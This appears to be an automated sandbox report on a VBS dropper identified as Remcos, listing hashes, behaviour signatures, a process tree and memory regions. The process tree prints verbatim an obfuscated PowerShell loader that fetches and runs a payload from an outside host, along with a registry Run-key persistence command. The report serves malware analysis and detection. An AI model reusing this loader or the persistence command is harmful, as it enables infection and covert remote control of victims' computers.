Analysis

  • max time kernel
    67s
  • max time network
    72s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15/02/2024, 05:40

General

  • Target

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs

  • Size

    93KB

  • MD5

    79094e9847a7bf1ffd13972fd7f4fe9f

  • SHA1

    98d0d34a146712d3399fcacf2369e11c4cd9c4ea

  • SHA256

    d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c

  • SHA512

    e0399f4fe05cdbc25dc193142d017d1161adb049cfd82dce26c03054f52825c43964b30c6c189cc293c85fb5f6da1092e62cfc736072294be62c23463a8386a9

  • SSDEEP

    1536:HJglU0P4wDaWxyADV76w2bnQReOlDaP5QrIWG2CSAe0i4rEOz+d:pglnvD1xyAp761kRe8DaP54G3eL4rvyd

Malware Config

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d0fceb6bb0ed4dc5b8601e9560a291fe726958c774b0dc8647d1b7aec3f0c84c.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#bawsuntti Preterien Dkfjernon Slavehandl #>;$Ellagate=(cmd /c set /A 115^^0);Function Cyklis197 ([String]$Fakkelto){$Ellagate=[char][int]$Ellagate;$Udvidelser=$Ellagate+'ubstring';$Darghinho=8;$disbrainw=Elipser4($Fakkelto);For($Betjenbly=7; $Betjenbly -lt $disbrainw; $Betjenbly+=$Darghinho){$Blabb=$Fakkelto.$Udvidelser.Invoke($Betjenbly, 1);$Elipser=$Elipser+$Blabb;}$Elipser;}function Sikkerh ($Milj93){& ($Elipser01) ($Milj93);}function Elipser4 ([String]$Gosp){$ocaadrena1=$Gosp.Length-1;$ocaadrena1;}$Elipser02=Cyklis197 'HeptadeT KrybenrAbhorsoaIlluminn AntistsSkvtsglfMentioneTilskynr benfrirTjaldsbi PerukenSleevedgDansemu ';$Packt=Cyklis197 'Ddemandhtremolot SuprastRectangpmellemgsOvertag:Parader/ Flacke/ScaphogsLkkestrcOverheaaFrsemasiSprinklntilslutsLindbereOvertimt BotchioForttni.WeakytrcConcento SubsammMorallr.IbrugtabSkonnerrEbdomad/TilbagewManatinpRensnin-Ekspatra mennesdDesultomBorolibiKusamren Monome/ NashaacChromatyUndecoycHanefjelDelirioosolfangtDvrgkonh NeglecuCospons.FluidicpDansantfNarratemBilleda ';$Elipser01=Cyklis197 'Beredeli LeasineRepressxHandlin ';$Elipser00=Cyklis197 'Neathmo$LactonigKonfisklPolyestoAnmeldebInterioahovedstl Folkso:PengepooFaseindcBecausea FuzegeaIntrodud mezcalrFerskvae KameranEmbryopaForuren8Smuglma Endoper=Hexagyn HildegaSBldtvant AptalvaFedepserNoncoagtIsaianw-afformaBCryoplaiTilbjelt DispossBrdfabrT Holopar GrasseaHeartbrn LuteolsQuitchefNitrateeNegerborhilltop Finansb-VarigheSnedrakkoKologituShoplifrSphyrnicStvkonse Sllern Ecchbla$ BortpeP OzzieoaUndersecStenogakAfrasiatBoldfac Genspej-ElelfenDBrinishePropagasRivetndtkaffirsiElectranCalceusaCupelertcorbicui AlricgoFredskonKnaveri Pretes$OptjeneoTsubokoc Fastbaa JerntnaCardiecdUlykkesrRedialleSomitalnEmbatheaBegaudc2Aproned ';Sikkerh (Cyklis197 'autodkk$Autorisg herrerlNonopproPostnumb Cordiaa HentehlFilialn:NonprotoOvervrecFortyskaAmphithaSpeditidHormonorTetraloe CharcinRugegspadilatom2jugland=Scleren$GluedbaeGeneralnExpellevBrystsv:ElytrinaStenkulp Dupperp ConfirdAfledniaDiamondt samalqaInstruk ') ;Sikkerh (Cyklis197 'GeneralISkraldsmmillionpVsentlioWafthyprBandagetKulturc- HvisaaMOmbetrkoSlidtsodVrksteduStrandklheltalseLittera EsthacyBRenegotiModerkat plenums SpartlTkogechorUlvebloa AcinetnTakahessLeverinfVomitore GasterrJohnydo ') ;$ocaadrena2=$ocaadrena2+'\Taksati.kon' ;Sikkerh (Cyklis197 ' Comedy$DriftskgMedarbelPaabegyo LagerabUnscornaRadiiunl Pedant:Denimmeo SammencKlanglsaWhistlea HvidvidEksplosrVidaabne NonnatnetologiaJetesbe7 clappe=Agtsomm(RottefnTurostifeUbestvesWavelestHaandkl-SupermoP TestfiaBhmernetForhaanhPromode Svinghj$ GodmotoAcetomecErhverva TenebraAvissaldSindsstrOdorleseEikefifnTekstkraLsersmu2Ecandac)Pandehu ') ;while (-not $ocaadrena7) {Sikkerh (Cyklis197 ' GringeIFarvehafAristok Shampon(Salting$congessoDepravecDerommeaIndpakkaConubiudInsultpr SociomeVanskbnnUndergiaMontmor8 admira.VandprvJBygningoCatkinabStrykniSParsonotBrachygaKongerntBrunerieGatekee Manpack-KhevzureUnmuddlq Tauten Sidelin$UngorgeEAtionsplWoolliniVerdensp Clystes StartbeSpaniperSkraapa0 Smashe2Kartote)Oozoali Oblataa{ NvnermS RygepatFjernstaForhandrBookbintResumee-TantaraSResterelBlazereeLiturgieVrdimngpToxalbu Overtop1Blandin}Outparae UnderflHovednrspiggybae Rivalr{SigteevSTotemittSterlinaTsenesmrPatchwotStatefu- TypeabSTranslalStrattoeTidsskreForsikrpNivella Perspir1 Wacksy; DisjasSTabelopiMutinyskCognizekSlutbete SkrmharLuftbaah Nogged Broerun$VekselvEHarebotlPjokkedi MelanepBortledsMasticie FlokinrOpkobli0Fdevare0Paltril}Osophon ');Sikkerh (Cyklis197 'Yokcliq$OutswingOrwellslPhlogisoMantappb positiaVgrerthlAccosts:NonodoroTiredomcbrugtbaaTilbjelaUnsatisdsystemirPegasuse DivisinBenchwoaAdminis7Keglere=Blindga(BiotechTFlgestneOplsendsPretraitTumbleh-ShipmanP Cephala NetadrtMetacenhbrnesen Arkite$ExplanaoNotatiocSemificaCervicoa clintidOtiliefrScrollbe LuftfanGasovnea Python2Zephani)Anslags ') ;}Sikkerh (Cyklis197 'Winnowe$KrftenlgForklarlJuanitaoTransanbRudimenaNormskolEkstrak:DeodoriNBellwineDelatindBilledsj Saviou1Stereot7Folketi4Bajonet Forveks=Diamond UmisforG havegae Autoset Frugtk-PustuleCCrissumoAltercan AftrkktSexageseBrandlonSyrligstGuidebo Trolse$Technolo CiselecScanninaKursnedaFaqlowedInevitarKursvrdeUnbandanagribusaTirrede2Skriben ');Sikkerh (Cyklis197 'Transce$SensommgEngrosblKnibtano BlgedabUnexhumaDekoratlUundvig:ScranneD FordrveSnowshoa LandflcPadesoyoIndubitnXylinde Rundesa=Frdiggr Wellcur[ touchlSMjesuniyTankesys IhjelptFangstbenskeformHairspr.PrinterCFnikerno RevisonViolentvCoefficeHalvlegr Friscot Enneas]Ripplet:Ensilag:MetrikkFProbattrBlaffero serailm YoghurBMattereaKnledsmsPishhoveAdvisor6studhor4 FalsumSOmhyggetUnshipsrVidvinkiStramtsn myoprogNdvrget( Grinag$ PreabuNMiskmaseBlystbeddiurnuljShamans1Pottosf7Apanage4Berteli)Villale ');Sikkerh (Cyklis197 ' Levuli$VaricocgUnisonalUnexpecoGutsybub PantalaStringclCobbies:InconelEcomputelKilocaliCradlerpdormitosForespeeSwissesrAchines2Indavle Preserv=Toxinea Devalue[DecapetSYmtertryProfounsIndkrvnt BruttoeTilspurmPathbre.SubantiT emboweeOtteaarxCentraltDepende.FarvemsEFallernnAgertidcObtempeoBurielsdDramatiiTodagesnManipulg Riglin]Anhnger:Sorings:afledteA FootraSTrallevCHessparIEmbarquISirupyk.OclocktG Vemodoe PuffedtPhonetiSSplotchtGevirscrDoctrini JohnsenGennemsgSubvers(Gavflab$SektionDGrammateTriboloaSnurpencExpireuoManiocan Proful)Cathept ');Sikkerh (Cyklis197 'ophnges$BogtrykgdunlinblEbonizeoSuccessbResonera Fejltil kuankl: JannsgE PumperlStrepsii SomedepRhythmisAmphigoe PartiorHjertes3Demokra=Skoalin$ReemigrEStewardlFisedesigulnarepProduktsQuadpleeSekunderSovietc2 produk.EurekafsSnippetuReprsenbDermatosAdelsmatAtomknurSammenbiVittussnMurstengDiffusi(skeyhel3 Fordyb0Mercypr9Prosely8Geograf8Abcerne6Begynde,Unallit2 Niases4Beatusp1Udmaler6Exorciz0Quiresh)Asylans ');Sikkerh $Elipser3;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1512
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:3724
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#bawsuntti Preterien Dkfjernon Slavehandl #>;$Ellagate=(cmd /c set /A 115^^0);Function Cyklis197 ([String]$Fakkelto){$Ellagate=[char][int]$Ellagate;$Udvidelser=$Ellagate+'ubstring';$Darghinho=8;$disbrainw=Elipser4($Fakkelto);For($Betjenbly=7; $Betjenbly -lt $disbrainw; $Betjenbly+=$Darghinho){$Blabb=$Fakkelto.$Udvidelser.Invoke($Betjenbly, 1);$Elipser=$Elipser+$Blabb;}$Elipser;}function Sikkerh ($Milj93){& ($Elipser01) ($Milj93);}function Elipser4 ([String]$Gosp){$ocaadrena1=$Gosp.Length-1;$ocaadrena1;}$Elipser02=Cyklis197 'HeptadeT KrybenrAbhorsoaIlluminn AntistsSkvtsglfMentioneTilskynr benfrirTjaldsbi PerukenSleevedgDansemu ';$Packt=Cyklis197 'Ddemandhtremolot SuprastRectangpmellemgsOvertag:Parader/ Flacke/ScaphogsLkkestrcOverheaaFrsemasiSprinklntilslutsLindbereOvertimt BotchioForttni.WeakytrcConcento SubsammMorallr.IbrugtabSkonnerrEbdomad/TilbagewManatinpRensnin-Ekspatra mennesdDesultomBorolibiKusamren Monome/ NashaacChromatyUndecoycHanefjelDelirioosolfangtDvrgkonh NeglecuCospons.FluidicpDansantfNarratemBilleda ';$Elipser01=Cyklis197 'Beredeli LeasineRepressxHandlin ';$Elipser00=Cyklis197 'Neathmo$LactonigKonfisklPolyestoAnmeldebInterioahovedstl Folkso:PengepooFaseindcBecausea FuzegeaIntrodud mezcalrFerskvae KameranEmbryopaForuren8Smuglma Endoper=Hexagyn HildegaSBldtvant AptalvaFedepserNoncoagtIsaianw-afformaBCryoplaiTilbjelt DispossBrdfabrT Holopar GrasseaHeartbrn LuteolsQuitchefNitrateeNegerborhilltop Finansb-VarigheSnedrakkoKologituShoplifrSphyrnicStvkonse Sllern Ecchbla$ BortpeP OzzieoaUndersecStenogakAfrasiatBoldfac Genspej-ElelfenDBrinishePropagasRivetndtkaffirsiElectranCalceusaCupelertcorbicui AlricgoFredskonKnaveri Pretes$OptjeneoTsubokoc Fastbaa JerntnaCardiecdUlykkesrRedialleSomitalnEmbatheaBegaudc2Aproned ';Sikkerh (Cyklis197 'autodkk$Autorisg herrerlNonopproPostnumb Cordiaa HentehlFilialn:NonprotoOvervrecFortyskaAmphithaSpeditidHormonorTetraloe CharcinRugegspadilatom2jugland=Scleren$GluedbaeGeneralnExpellevBrystsv:ElytrinaStenkulp Dupperp ConfirdAfledniaDiamondt samalqaInstruk ') ;Sikkerh (Cyklis197 'GeneralISkraldsmmillionpVsentlioWafthyprBandagetKulturc- HvisaaMOmbetrkoSlidtsodVrksteduStrandklheltalseLittera EsthacyBRenegotiModerkat plenums SpartlTkogechorUlvebloa AcinetnTakahessLeverinfVomitore GasterrJohnydo ') ;$ocaadrena2=$ocaadrena2+'\Taksati.kon' ;Sikkerh (Cyklis197 ' Comedy$DriftskgMedarbelPaabegyo LagerabUnscornaRadiiunl Pedant:Denimmeo SammencKlanglsaWhistlea HvidvidEksplosrVidaabne NonnatnetologiaJetesbe7 clappe=Agtsomm(RottefnTurostifeUbestvesWavelestHaandkl-SupermoP TestfiaBhmernetForhaanhPromode Svinghj$ GodmotoAcetomecErhverva TenebraAvissaldSindsstrOdorleseEikefifnTekstkraLsersmu2Ecandac)Pandehu ') ;while (-not $ocaadrena7) {Sikkerh (Cyklis197 ' GringeIFarvehafAristok Shampon(Salting$congessoDepravecDerommeaIndpakkaConubiudInsultpr SociomeVanskbnnUndergiaMontmor8 admira.VandprvJBygningoCatkinabStrykniSParsonotBrachygaKongerntBrunerieGatekee Manpack-KhevzureUnmuddlq Tauten Sidelin$UngorgeEAtionsplWoolliniVerdensp Clystes StartbeSpaniperSkraapa0 Smashe2Kartote)Oozoali Oblataa{ NvnermS RygepatFjernstaForhandrBookbintResumee-TantaraSResterelBlazereeLiturgieVrdimngpToxalbu Overtop1Blandin}Outparae UnderflHovednrspiggybae Rivalr{SigteevSTotemittSterlinaTsenesmrPatchwotStatefu- TypeabSTranslalStrattoeTidsskreForsikrpNivella Perspir1 Wacksy; DisjasSTabelopiMutinyskCognizekSlutbete SkrmharLuftbaah Nogged Broerun$VekselvEHarebotlPjokkedi MelanepBortledsMasticie FlokinrOpkobli0Fdevare0Paltril}Osophon ');Sikkerh (Cyklis197 'Yokcliq$OutswingOrwellslPhlogisoMantappb positiaVgrerthlAccosts:NonodoroTiredomcbrugtbaaTilbjelaUnsatisdsystemirPegasuse DivisinBenchwoaAdminis7Keglere=Blindga(BiotechTFlgestneOplsendsPretraitTumbleh-ShipmanP Cephala NetadrtMetacenhbrnesen Arkite$ExplanaoNotatiocSemificaCervicoa clintidOtiliefrScrollbe LuftfanGasovnea Python2Zephani)Anslags ') ;}Sikkerh (Cyklis197 'Winnowe$KrftenlgForklarlJuanitaoTransanbRudimenaNormskolEkstrak:DeodoriNBellwineDelatindBilledsj Saviou1Stereot7Folketi4Bajonet Forveks=Diamond UmisforG havegae Autoset Frugtk-PustuleCCrissumoAltercan AftrkktSexageseBrandlonSyrligstGuidebo Trolse$Technolo CiselecScanninaKursnedaFaqlowedInevitarKursvrdeUnbandanagribusaTirrede2Skriben ');Sikkerh (Cyklis197 'Transce$SensommgEngrosblKnibtano BlgedabUnexhumaDekoratlUundvig:ScranneD FordrveSnowshoa LandflcPadesoyoIndubitnXylinde Rundesa=Frdiggr Wellcur[ touchlSMjesuniyTankesys IhjelptFangstbenskeformHairspr.PrinterCFnikerno RevisonViolentvCoefficeHalvlegr Friscot Enneas]Ripplet:Ensilag:MetrikkFProbattrBlaffero serailm YoghurBMattereaKnledsmsPishhoveAdvisor6studhor4 FalsumSOmhyggetUnshipsrVidvinkiStramtsn myoprogNdvrget( Grinag$ PreabuNMiskmaseBlystbeddiurnuljShamans1Pottosf7Apanage4Berteli)Villale ');Sikkerh (Cyklis197 ' Levuli$VaricocgUnisonalUnexpecoGutsybub PantalaStringclCobbies:InconelEcomputelKilocaliCradlerpdormitosForespeeSwissesrAchines2Indavle Preserv=Toxinea Devalue[DecapetSYmtertryProfounsIndkrvnt BruttoeTilspurmPathbre.SubantiT emboweeOtteaarxCentraltDepende.FarvemsEFallernnAgertidcObtempeoBurielsdDramatiiTodagesnManipulg Riglin]Anhnger:Sorings:afledteA FootraSTrallevCHessparIEmbarquISirupyk.OclocktG Vemodoe PuffedtPhonetiSSplotchtGevirscrDoctrini JohnsenGennemsgSubvers(Gavflab$SektionDGrammateTriboloaSnurpencExpireuoManiocan Proful)Cathept ');Sikkerh (Cyklis197 'ophnges$BogtrykgdunlinblEbonizeoSuccessbResonera Fejltil kuankl: JannsgE PumperlStrepsii SomedepRhythmisAmphigoe PartiorHjertes3Demokra=Skoalin$ReemigrEStewardlFisedesigulnarepProduktsQuadpleeSekunderSovietc2 produk.EurekafsSnippetuReprsenbDermatosAdelsmatAtomknurSammenbiVittussnMurstengDiffusi(skeyhel3 Fordyb0Mercypr9Prosely8Geograf8Abcerne6Begynde,Unallit2 Niases4Beatusp1Udmaler6Exorciz0Quiresh)Asylans ');Sikkerh $Elipser3;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3992
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:2772
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
                PID:2984
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe"
                4⤵
                  PID:4536
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe"
                  4⤵
                    PID:772
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe"
                    4⤵
                      PID:2088
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe"
                      4⤵
                        PID:1924
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe"
                        4⤵
                          PID:492
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          4⤵
                            PID:2040
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe"
                            4⤵
                              PID:3660
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe"
                              4⤵
                                PID:2728
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe"
                                4⤵
                                  PID:4968
                                • C:\Program Files (x86)\windows mail\wab.exe
                                  "C:\Program Files (x86)\windows mail\wab.exe"
                                  4⤵
                                    PID:5024
                                  • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                    "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                    4⤵
                                      PID:1348
                                    • C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                      "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                      4⤵
                                      • Suspicious use of NtCreateThreadExHideFromDebugger
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of WriteProcessMemory
                                      PID:3988
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "subthrill" /t REG_EXPAND_SZ /d "%Penci% -w 1 $Ench22=(Get-ItemProperty -Path 'HKCU:\Plupatriot\').Fynboe;%Penci% ($Ench22)"
                                        5⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1520
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "subthrill" /t REG_EXPAND_SZ /d "%Penci% -w 1 $Ench22=(Get-ItemProperty -Path 'HKCU:\Plupatriot\').Fynboe;%Penci% ($Ench22)"
                                          6⤵
                                          • Adds Run key to start application
                                          • Modifies registry key
                                          PID:548

                              Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nzvxg1er.q0k.ps1

                                      Filesize

                                      60B

                                      MD5

                                      d17fe0a3f47be24a6453e9ef58c94641

                                      SHA1

                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                      SHA256

                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                      SHA512

                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    • memory/1512-5-0x0000016A58D00000-0x0000016A58D22000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/1512-10-0x00007FFBAC9B0000-0x00007FFBAD471000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/1512-11-0x0000016A71200000-0x0000016A71210000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/1512-12-0x0000016A71200000-0x0000016A71210000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/1512-13-0x0000016A71200000-0x0000016A71210000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/1512-14-0x0000016A71D00000-0x0000016A71D26000-memory.dmp

                                      Filesize

                                      152KB

                                    • memory/1512-15-0x0000016A71D50000-0x0000016A71D64000-memory.dmp

                                      Filesize

                                      80KB

                                    • memory/1512-82-0x00007FFBAC9B0000-0x00007FFBAD471000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/1512-37-0x0000016A71200000-0x0000016A71210000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/1512-36-0x0000016A71200000-0x0000016A71210000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/1512-35-0x00007FFBAC9B0000-0x00007FFBAD471000-memory.dmp

                                      Filesize

                                      10.8MB

                                    • memory/3988-91-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-76-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-87-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-86-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-89-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-85-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-90-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-68-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-92-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-84-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-83-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-93-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-77-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-79-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-78-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-88-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-75-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-74-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-73-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-72-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-71-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-70-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-52-0x0000000077B81000-0x0000000077CA1000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/3988-53-0x0000000077C08000-0x0000000077C09000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3988-60-0x0000000077B81000-0x0000000077CA1000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/3988-63-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-64-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-65-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3988-62-0x0000000001000000-0x0000000005855000-memory.dmp

                                      Filesize

                                      72.3MB

                                    • memory/3988-69-0x0000000077B81000-0x0000000077CA1000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/3988-66-0x0000000000400000-0x00000000005E4000-memory.dmp

                                      Filesize

                                      1.9MB

                                    • memory/3992-33-0x00000000061B0000-0x00000000061CE000-memory.dmp

                                      Filesize

                                      120KB

                                    • memory/3992-67-0x0000000075160000-0x0000000075910000-memory.dmp

                                      Filesize

                                      7.7MB

                                    • memory/3992-51-0x0000000002900000-0x0000000002910000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3992-50-0x0000000077B81000-0x0000000077CA1000-memory.dmp

                                      Filesize

                                      1.1MB

                                    • memory/3992-48-0x0000000075160000-0x0000000075910000-memory.dmp

                                      Filesize

                                      7.7MB

                                    • memory/3992-47-0x00000000087C0000-0x000000000D015000-memory.dmp

                                      Filesize

                                      72.3MB

                                    • memory/3992-46-0x00000000078E0000-0x00000000078E1000-memory.dmp

                                      Filesize

                                      4KB

                                    • memory/3992-45-0x0000000002900000-0x0000000002910000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3992-44-0x00000000076A0000-0x00000000076B4000-memory.dmp

                                      Filesize

                                      80KB

                                    • memory/3992-43-0x0000000007650000-0x0000000007672000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/3992-42-0x0000000008210000-0x00000000087B4000-memory.dmp

                                      Filesize

                                      5.6MB

                                    • memory/3992-41-0x00000000073C0000-0x00000000073E2000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/3992-40-0x0000000007410000-0x00000000074A6000-memory.dmp

                                      Filesize

                                      600KB

                                    • memory/3992-39-0x0000000007340000-0x000000000735A000-memory.dmp

                                      Filesize

                                      104KB

                                    • memory/3992-38-0x0000000007B90000-0x000000000820A000-memory.dmp

                                      Filesize

                                      6.5MB

                                    • memory/3992-34-0x00000000061E0000-0x000000000622C000-memory.dmp

                                      Filesize

                                      304KB

                                    • memory/3992-28-0x0000000005B40000-0x0000000005E94000-memory.dmp

                                      Filesize

                                      3.3MB

                                    • memory/3992-22-0x0000000005A10000-0x0000000005A76000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/3992-21-0x0000000005990000-0x00000000059F6000-memory.dmp

                                      Filesize

                                      408KB

                                    • memory/3992-20-0x00000000058F0000-0x0000000005912000-memory.dmp

                                      Filesize

                                      136KB

                                    • memory/3992-19-0x0000000005290000-0x00000000058B8000-memory.dmp

                                      Filesize

                                      6.2MB

                                    • memory/3992-18-0x0000000002900000-0x0000000002910000-memory.dmp

                                      Filesize

                                      64KB

                                    • memory/3992-17-0x0000000002860000-0x0000000002896000-memory.dmp

                                      Filesize

                                      216KB

                                    • memory/3992-16-0x0000000075160000-0x0000000075910000-memory.dmp

                                      Filesize

                                      7.7MB